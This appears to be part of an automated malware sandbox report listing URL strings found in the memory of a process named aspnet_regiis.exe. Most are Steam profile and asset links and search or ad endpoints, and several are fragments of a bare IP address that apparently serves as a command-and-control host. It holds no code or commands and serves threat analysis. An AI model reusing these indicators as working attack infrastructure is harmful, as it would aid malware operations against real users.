Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9CBAAEC
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9FIDBFC
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9JKFIDBFC--
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: 76561199780418869[1].htm.3.dr String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.co
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
